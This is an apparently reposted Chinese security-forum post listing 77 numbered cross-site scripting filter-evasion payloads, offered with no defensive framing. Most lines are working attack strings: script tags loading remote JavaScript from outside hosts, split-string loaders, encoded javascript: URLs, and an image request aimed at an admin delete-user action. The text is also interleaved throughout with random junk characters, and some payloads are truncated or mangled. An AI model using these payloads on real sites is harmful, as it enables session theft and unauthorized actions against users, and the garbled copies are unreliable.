貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
0 l# p$ L9 s4 K- }9 H9 [# T6 }$ N* i5 i h' M7 [4 Z6 [+ |9 s
(1)普通的XSS JavaScript注入
4 t8 t# y. m/ p% e <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) @" l7 i; V4 V: N. U# _
) g$ P) g, x1 J; r0 i {) i (2)IMG标签XSS使用JavaScript命令% H3 F/ ~, [" P5 `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 ]# n' }1 Y4 ?2 M: L+ R, a) d
. t' k8 \# E1 G# `" z5 b9 l! u8 ]* D (3)IMG标签无分号无引号1 `- t8 r9 ~, J! ?0 T2 w2 k: {
<IMG SRC=javascript:alert(‘XSS’)>
1 i0 A2 z0 j( E9 P+ ?7 D2 A1 \2 ^ X; k# e
(4)IMG标签大小写不敏感
+ @: l( U O/ k7 Q. q7 G3 O <IMG SRC=JaVaScRiPt:alert(‘XSS’)>
) X; ~7 ?2 ?) V' f z9 E$ Z6 o1 O7 v/ U
(5)HTML编码(必须有分号)
- Y% D- J- ?3 e0 J1 j }+ M <IMG SRC=javascript:alert(“XSS”)>
( x {3 v% C8 X1 K' {( y% A/ ~8 i+ b5 M3 e& |8 [( \! e; F1 S
(6)修正缺陷IMG标签, v6 e; j2 B. F* w7 P
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>. U8 \9 h6 I2 T
7 K/ v/ U0 \1 \$ s: t7 E5 h, V2 d (7)formCharCode标签(计算器)
: z7 h0 h4 C) C% @- ?! p9 R <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
& f5 @6 Q3 p1 P" O2 r4 D# A& L. z8 r- x# J6 T* P. ?& u
(8)UTF-8的Unicode编码(计算器)- z* O0 M; d! U8 }4 Z9 c2 A" S$ g2 a0 c
<IMG SRC=jav..省略..S')>
: L7 g# S5 ^! n+ `8 \2 U; q8 ]& D8 Q# x
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
% B# n* l" A0 ^9 Q <IMG SRC=jav..省略..S')>
0 ~+ x. a' K y& w
; s4 ?9 P f4 o* L0 t (10)十六进制编码也是没有分号(计算器)
: T0 J# n. I4 P8 {& t5 e% K0 l! S <IMG SRC=java..省略..XSS')>% G) [2 @3 t& ^8 \% s6 X E) N
8 r0 |1 p9 T3 O: @
(11)嵌入式标签,将Javascript分开
$ t. O. J4 v; D <IMG SRC=”jav ascript:alert(‘XSS’);”>
: ^# S/ O/ ^% Q7 ?- y) Z$ D" R2 {9 t% V6 K+ D6 f
(12)嵌入式编码标签,将Javascript分开
- f9 r/ @, w2 G9 u <IMG SRC=”jav ascript:alert(‘XSS’);”>
: V& x) V3 ?/ i( r7 |6 M5 @6 e0 t6 {& T3 Z6 a
(13)嵌入式换行符
) L& M/ P, c0 z* l <IMG SRC=”jav ascript:alert(‘XSS’);”>% h1 w" H( h* t) Z
0 H9 g1 c( a9 w. F* Y5 \4 l; a) Z (14)嵌入式回车
( ]* w) J$ d$ R0 h5 r <IMG SRC=”jav ascript:alert(‘XSS’);”>
0 B& e- N4 L6 w) ~$ W3 h7 _& s7 s
) t0 ?6 c0 ?- W, Y/ n (15)嵌入式多行注入JavaScript,这是XSS极端的例子" _& F" g+ f% n4 F
<IMG SRC=”javascript:alert(‘XSS‘)”>
. Q4 Z2 `) [; b' F# r) A8 s- o7 o, y9 ^9 j* D/ S1 g
(16)解决限制字符(要求同页面)
; b/ p2 J" {. T2 H <script>z=’document.’</script>
; B" `' e& J0 V) r. Q9 d5 S/ W <script>z=z+’write(“‘</script>5 M3 j* R/ e# I& M: X* i
<script>z=z+’<script’</script>/ t' U2 z. b# a- k! d
<script>z=z+’ src=ht’</script> v/ ]+ Q7 v5 I, o) h& t
<script>z=z+’tp://ww’</script>
( k! G! P& c1 { <script>z=z+’w.shell’</script>; W9 d @2 Y O4 v/ k# [4 {
<script>z=z+’.net/1.’</script>7 ]2 i0 p8 o% d, D8 c
<script>z=z+’js></sc’</script>
! a0 S1 X7 B) J' r <script>z=z+’ript>”)’</script>$ ]# `% I6 u) z a3 R7 h
<script>eval_r(z)</script>
9 W7 a2 y# v# y1 R0 ` p/ ], V! J7 e* v5 h% A5 z" T/ J
(17)空字符
5 L- G6 o' a. z& H3 v perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out4 {# v5 t; {* L% s& U, a2 c! t
( Y% m* a' {/ E) i (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
* _; Q& u7 N# D4 ^ perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out+ a+ H0 S- r$ N3 F- [
7 `4 \# n( c+ A" s& U0 ^" u (19)Spaces和meta前的IMG标签
# o3 M$ t2 R0 W8 s8 F <IMG SRC=” � javascript:alert(‘XSS’);”>
8 a! A% z2 s5 J0 v: W
, r( j% _ ~, e5 d( M' h (20)Non-alpha-non-digit XSS; [& ?9 o4 X/ d5 E' e3 [9 w/ N
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>( F6 f. K, B4 U+ A) b
4 o, P6 Q6 ~& T
(21)Non-alpha-non-digit XSS to 2
7 W+ r7 |3 |( j+ Q <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>* c. g- a2 `( D: j& ~! d
, q. _/ A) X+ p1 y# e (22)Non-alpha-non-digit XSS to 39 t' B% [( W; G6 }
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
* ?- n& k& H2 I( W5 K# Z
; x- w- T. A% y' N4 [ (23)双开括号
- l) X1 `/ \2 M <<SCRIPT>alert(“XSS”);//<</SCRIPT>8 ~# W: R* [) Q+ C2 _ K
2 K8 s* U5 S/ e. J4 k
(24)无结束脚本标记(仅火狐等浏览器)8 T& [ j% L- n* ~2 A$ r
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
8 A, d! g. I! L+ |1 _; l5 a( a( d r# J+ i; F" z* i1 d+ K" O
(25)无结束脚本标记2* ~3 y- {2 {8 \/ m7 Z% e8 K) y
<SCRIPT SRC=//3w.org/XSS/xss.js>
! W, i2 `9 |. P, j9 R8 S" u) R- P w. o- y6 ?4 z. D
(26)半开的HTML/JavaScript XSS5 p1 z3 O; i3 Z
<IMG SRC=”javascript:alert(‘XSS’)”9 j1 i1 W; m; K, Y$ z1 d
* Z; m3 M" q& k p, Z& }# N& R4 N4 t0 M9 E (27)双开角括号
" ^9 @, U) d* ^! s4 V% D& Z" v j2 _ <iframe src=http://3w.org/XSS.html <
8 d! A" Q1 v9 e' Q; e9 D% z) p. @* ~
(28)无单引号 双引号 分号
1 G6 r" k$ Y k! U% ^) K/ X% w <SCRIPT>a=/XSS/" C9 A- \) c/ p, t5 V3 ~% p
alert(a.source)</SCRIPT>9 P& a" b$ |/ i Y
' ~2 C/ M/ U) @$ k7 _
(29)换码过滤的JavaScript# }9 O: C2 {# a2 v- ~6 T2 N9 s) S
\”;alert(‘XSS’);// l% Q' f) m; ^5 ?# ], h
! ^& } J+ M) E/ |" Q
(30)结束Title标签
8 O3 C1 C5 j% P </TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% R# w+ z/ O7 J( P0 M9 K$ U# p" ~5 B
(31)Input Image9 ]$ K3 m" E2 d4 P: J1 m5 H
<INPUT SRC=”javascript:alert(‘XSS’);”>+ T7 h+ \* N5 u3 f1 v7 j: {4 i. \5 Q
8 U- R' q7 O6 P& X' v9 x (32)BODY Image( |) T& x/ A' c4 T8 N7 M
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
/ P7 {7 _( z+ r6 \) D& ?* _; [; F! R( ]
) E1 c/ S/ P) U- K2 p (33)BODY标签 n" S7 G8 C2 B
<BODY(‘XSS’)>
6 i$ Q; t: [. x+ X8 Q+ }3 r
/ v, o( p" D2 ~ (34)IMG Dynsrc, E3 _# v; m, S) d" |/ U
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
% g6 x" o9 u" }+ C6 k0 M1 N: h
(35)IMG Lowsrc
1 W. C7 m2 ^' w# r <IMG LOWSRC=”javascript:alert(‘XSS’)”>- m" {" K4 }: ]3 l8 {/ g
0 }/ X1 D+ Q8 J+ E! Z8 @( U Q
(36)BGSOUND
" S+ p0 u6 R N) K! j. ] <BGSOUND SRC=”javascript:alert(‘XSS’);”># j( ~$ T& q" Z: Y
! l! w4 r9 G- I, z i( S% ]+ \: \ (37)STYLE sheet
F( i0 J" x3 @ <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>1 g8 t" V" v& r4 z
5 I V: ]; m" B0 W% g `
(38)远程样式表; a3 N4 u7 S) c: D# H
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
% V* E9 X. | G4 ~0 \: N" H+ v* E% d+ d
(39)List-style-image(列表式)* v6 q1 X( U9 V3 N% H# A
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS, ? D% X% r5 R% U6 r' h) f/ O
) Q: f- Z/ h* _' t (40)IMG VBscript
3 p' b* b2 Y. S8 v6 I1 Y <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS! k* C: Q$ x5 r% b% s
+ `' e! L( p( X( A# \ (41)META链接url
3 v- O4 I e3 l8 C% s <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
. v/ K. `: C7 b. E) o$ a8 r* |! X6 Z0 e9 `3 C( I* G; s& ]
(42)Iframe3 Z$ q, Y* f, T+ r; \4 G2 G8 D( `
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME># i4 R$ o) ~) L. r. t# `5 f
: S* y9 q# t' B4 i6 B* N# e* L$ K. W
(43)Frame
; u0 P$ b" _4 a <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
- N: V( T8 q( Y4 e) W- |( |$ l' e& i7 d! k: H8 E4 T! f/ l
(44)Table
3 W7 M* ]1 l! w9 J6 v/ R; a' ^ <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>. ~, z! H3 t( z
: ?- D" c9 \, d* E% O
(45)TD T T/ [1 o v! ], {; H
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>. |7 D; z2 v, j# F' G. M! P3 {
, D2 f6 k& c; V+ W$ j
(46)DIV background-image! E! L; M; p. g" _9 x* I$ _/ x7 b
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( L3 t: j, {1 l- Z; P S/ t3 m `2 q, R# _- @
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
: U; o' y0 |. ]3 ^8 X <DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>; @0 [# p6 g9 I# `4 `5 t7 }
% i7 O2 R% N: x. T6 @
(48)DIV expression! J- ~8 `5 D2 K5 G0 p8 V. |
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>" v& v8 ?+ c: y2 F. e2 R7 z
- r" K& J; N5 S/ i6 F
(49)STYLE属性分拆表达
( t4 `% T& S& L: ^; a <IMG STYLE=”xss:expression_r(alert(‘XSS’))”>( R: Y/ S8 e/ `' d
$ `1 e% k- X5 G5 S (50)匿名STYLE(组成:开角号和一个字母开头)
; o a8 q6 E9 L2 I2 \' i <XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
7 M$ ]7 B9 x H* I$ Z7 U3 P5 L6 Q8 i; O# w9 S, J8 b- F N8 u
(51)STYLE background-image- O z# E2 U, B1 P8 n) s
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
5 J- L. H0 W# O9 @8 u
- u" O% J% n+ _5 |$ p: Z (52)IMG STYLE方式: L" I6 l8 f% Y! D6 A
exppression(alert(“XSS”))’>1 L G# ~( h- x$ S' l) G7 M6 [
- H) X. ?4 m/ k5 b
(53)STYLE background
9 U9 w. L1 I$ E" V5 e <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>. z. u& n* B) t! e5 e8 C3 ?
* s4 F& V9 ~ `' B3 t: Y (54)BASE T$ G' f8 f. z' n
<BASE HREF=”javascript:alert(‘XSS’);//”>
8 J6 k2 i3 ]& Z/ j [4 @( v* q8 H* l W$ K, A' |
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
6 {# S& C% Q, T4 O# ^ <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>: ` k9 I0 F2 R5 W$ U) n
% ?9 p! X. X7 {* V* a
(56)在flash中使用ActionScrpt可以混进你XSS的代码
- S3 T y, `% U; ?( Q; U6 t a=”get”;$ I0 J' P) g' @; p5 m: u
b=”URL(\”";
) ~! P( f) M3 Q0 H( s2 i) E3 L1 K c=”javascript:”;+ ]9 X p# t* q: A
d=”alert(‘XSS’);\”)”;
3 w- M- H& M& ^8 _7 _$ r: W1 j0 q eval_r(a+b+c+d);
& A8 A* H1 T9 l2 `+ g& ^8 o
o; Y5 z/ p; J (57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
# c% z0 V" k1 j$ } <HTML xmlns:xss>. W0 |3 e) o4 G9 ]' D
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>1 z1 e4 A0 k9 }. w- q3 U1 h
<xss:xss>XSS</xss:xss>/ z4 t& N9 x w$ d$ O' J
</HTML>
4 j% w" \& r2 ?. \; |6 g z, ~/ ], t0 k7 q& @
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
6 j% @8 F% F. j a <SCRIPT SRC=””></SCRIPT>
! m: R$ o. {5 j3 W& r. V0 h( t6 i1 }6 k
9 N" o' k9 A" V* H: I6 l# G1 A (59)IMG嵌入式命令,可执行任意命令0 P' P1 c# g' n7 f* J3 t8 v" D/ d
<IMG SRC=”http://www.XXX.com/a.php?a=b”>. |, ^1 _6 h2 [6 O" I) [
9 M) a% K# F; | (60)IMG嵌入式命令(a.jpg在同服务器). v9 O- g+ N' {
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser. Q$ E- K$ T0 c# [* j
5 d0 S. {& F- Q2 m, o (61)绕符号过滤$ Q$ v0 n, n7 U' v
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
, ?% Z c; Z4 {
+ @" H' P7 B9 J3 [! Q (62)4 N+ z) }* I$ @- ^
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>, j/ z6 N3 K: z
3 s/ Q3 o2 D4 s4 B" U4 X, K! C (63)
8 `( x7 x9 f# v m; K& B <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>7 \: `$ I6 @/ w
3 a% ^# @; |# S( k" h
(64)3 |4 j/ j6 o+ N: P' m
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>" B8 x. v5 T5 ?% G+ _
" h2 s2 e) m7 b6 _ (65)( H( @0 P( _/ _
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
{. u6 j( q# f0 G/ X; `7 S. b# n* Y" m8 Y& h) [6 F
(66)1 x1 q1 C+ A7 M: l7 c
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>8 X" A$ O) h0 t) f5 @* o7 I
* g, T+ K$ z- I4 \6 |5 \$ a (67)2 \1 |4 S. J) ]8 M2 M; [
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
6 X3 w3 |( n; c8 v( M
- } ^9 ~: G. m+ H/ w8 X (68)URL绕行
' F z; O. |2 B6 m8 [' @ <A HREF=”http://127.0.0.1/”>XSS</A>
" G+ r W1 ?( o9 v, I$ J! M+ J5 u- H3 N' N! c- Y6 u
(69)URL编码
! X" F2 ~! J3 r. c0 L4 L _ <A HREF=”http://3w.org”>XSS</A>
6 S/ |8 K( Y5 r/ Y6 H
. D: K1 t1 h/ q) E' ^& K (70)IP十进制
% U: Z$ i# }' S `: a. ^+ [ <A HREF=”http://3232235521″>XSS</A>
- D; i: ]$ o# L
# @9 i8 ]7 p& c4 x, l" V$ t (71)IP十六进制: f0 o7 q2 F" K0 g3 `/ C
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
^4 H; ]4 C' x4 R% l5 S* J1 F+ \+ R# s( J! w
(72)IP八进制
4 I# m5 W: o7 k! C5 e <A HREF=”http://0300.0250.0000.0001″>XSS</A>
7 |: C5 l9 U, Q7 U* W1 b
" l0 Y2 ]2 L1 b (73)混合编码
" a: q7 X4 Y$ b/ e; Z% K( H <A HREF=”h$ d' e- J, `; w! O$ y; l g
tt p://6 6.000146.0×7.147/”">XSS</A>
* R* c7 b6 J) V& ^$ A3 e1 M3 o6 D' r( F. @: u+ ]1 l
(74)节省[http:]
1 ^3 b- q5 y' C; N9 M' _3 G <A HREF=”//www.google.com/”>XSS</A>/ B/ x6 y: \! x& b$ k( P
' g. e4 q$ ^" M( R# [! Z (75)节省[www]9 M6 y4 z' p+ D- C f3 o
<A HREF=”http://google.com/”>XSS</A>
; p: Q4 s0 \. c/ t! ^( M6 z; t. i% E: X# a4 ^# O
(76)绝对点绝对DNS7 [" M9 q' c) U& z4 H0 I
<A HREF=”http://www.google.com./”>XSS</A>
' e7 M. v( _+ o9 B' d2 g0 T& I" D( |- J
(77)javascript链接$ B# j9 d5 W! b9 N
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对